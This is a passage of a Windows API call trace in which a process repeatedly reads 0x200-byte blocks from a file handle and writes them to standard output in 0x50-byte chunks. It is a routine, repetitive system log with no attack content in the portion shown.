lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.860] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.860] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.860] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.860] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] GetFileType (hFile=0x50) returned 0x1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] GetFileType (hFile=0x50) returned 0x1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] GetFileType (hFile=0x50) returned 0x1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] GetFileType (hFile=0x50) returned 0x1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.861] GetFileType (hFile=0x50) returned 0x1 [0119.861] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0119.861] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.861] GetFileType (hFile=0x50) returned 0x1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.861] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.861] GetFileType (hFile=0x50) returned 0x1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.861] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.861] GetFileType (hFile=0x50) returned 0x1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.861] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.861] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.861] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.861] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.861] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.861] 
GetFileType (hFile=0x50) returned 0x1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.861] GetFileType (hFile=0x50) returned 0x1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] GetFileType (hFile=0x50) returned 0x1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] GetFileType (hFile=0x50) returned 0x1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] GetFileType (hFile=0x50) returned 0x1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] GetFileType (hFile=0x50) returned 0x1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 
[0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] GetFileType (hFile=0x50) returned 0x1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.863] GetFileType (hFile=0x50) returned 0x1 [0119.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.863] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.863] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.863] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.863] GetFileType (hFile=0x50) returned 0x1 [0119.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.863] GetFileType (hFile=0x50) returned 0x1 [0119.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.863] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.863] GetFileType (hFile=0x50) returned 0x1 [0119.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.863] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.863] GetFileType (hFile=0x50) returned 0x1 [0119.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.864] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.864] GetFileType (hFile=0x50) returned 0x1 [0119.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.864] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.864] GetFileType (hFile=0x50) returned 0x1 [0119.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.864] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.864] GetFileType (hFile=0x50) returned 0x1 [0119.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.864] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.864] GetFileType (hFile=0x50) returned 0x1 [0119.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.864] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.864] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.865] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.865] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.865] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] GetFileType (hFile=0x50) returned 0x1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] GetFileType (hFile=0x50) returned 0x1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] GetFileType (hFile=0x50) returned 0x1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] GetFileType (hFile=0x50) returned 0x1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] GetFileType 
(hFile=0x50) returned 0x1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] GetFileType (hFile=0x50) returned 0x1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] GetFileType (hFile=0x50) returned 0x1 [0119.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] GetFileType (hFile=0x50) returned 0x1 [0119.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.866] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.866] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.866] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.866] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.866] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] GetFileType (hFile=0x50) returned 0x1 [0119.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] GetFileType (hFile=0x50) returned 0x1 [0119.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] GetFileType (hFile=0x50) returned 0x1 [0119.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] GetFileType (hFile=0x50) returned 0x1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] GetFileType (hFile=0x50) returned 0x1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] GetFileType (hFile=0x50) returned 0x1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, 
lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] GetFileType (hFile=0x50) returned 0x1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] GetFileType (hFile=0x50) returned 0x1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.867] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.867] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.867] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.867] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] GetFileType (hFile=0x50) returned 0x1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] GetFileType (hFile=0x50) returned 0x1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] GetFileType (hFile=0x50) returned 0x1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 
[0119.868] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] GetFileType (hFile=0x50) returned 0x1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] GetFileType (hFile=0x50) returned 0x1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] GetFileType (hFile=0x50) returned 0x1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] GetFileType (hFile=0x50) returned 0x1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] GetFileType (hFile=0x50) returned 0x1 [0119.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] WriteFile (in: hFile=0x50, 
lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.869] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.869] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.869] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.869] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] GetFileType (hFile=0x50) returned 0x1 [0119.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] GetFileType (hFile=0x50) returned 0x1 [0119.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] GetFileType (hFile=0x50) returned 0x1 [0119.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] GetFileType (hFile=0x50) returned 0x1 [0119.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.869] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0119.869] GetFileType (hFile=0x50) returned 0x1 [0119.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.870] GetFileType (hFile=0x50) returned 0x1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.870] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.870] GetFileType (hFile=0x50) returned 0x1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.870] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.870] GetFileType (hFile=0x50) returned 0x1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.870] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.870] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.870] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.870] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.870] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, 
